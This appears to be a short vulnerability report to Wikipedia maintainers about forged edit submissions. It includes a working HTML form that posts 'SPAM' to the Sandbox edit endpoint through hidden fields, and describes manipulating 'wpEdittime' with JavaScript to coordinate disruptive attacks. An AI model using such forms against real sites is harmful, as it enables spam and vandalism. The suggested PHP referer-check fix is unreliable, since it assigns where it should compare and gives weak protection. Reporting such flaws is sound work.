Hi, You need to take steps to prevent malicious scripting- currently various forms of <form id="editform" name="editform" method="post" action=" http://en.wikipedia.org/w/index.php?title=Wikipedia:Sandbox&amp;action=… " enctype="multipart/form-data"> <input type='hidden' value="" name="wpSection" /> <input type='hidden' value="20000101010101" name="wpStarttime" /> <input type='hidden' value="20051216225758" name="wpEdittime" /> <input type='hidden' value="" name="wpScrolltop" id="wpScrolltop" /> <input type='hidden' value="SPAM" name="wpTextbox1" id="wpTextbox1"> <input tabindex='2' type='hidden' value="" name='wpSummary' id='wpSummary'/> <input tabindex='5' id='wpSave' type='submit' value="Save page" name="wpSave" accesskey="s" title="Save your changes [alt-s]"/> </form> That runs locally and uses basic javascript to change the 'wpEdittime' var to a few seconds before current time could be used to coordinate disruptive attacks. I know that it is a simple matter to fix entries, but it is a simpler matter to stick a if(getenv("HTTP_REFERER")='207.142.131.202'){}else{//fail handler} or similar line in the submit function.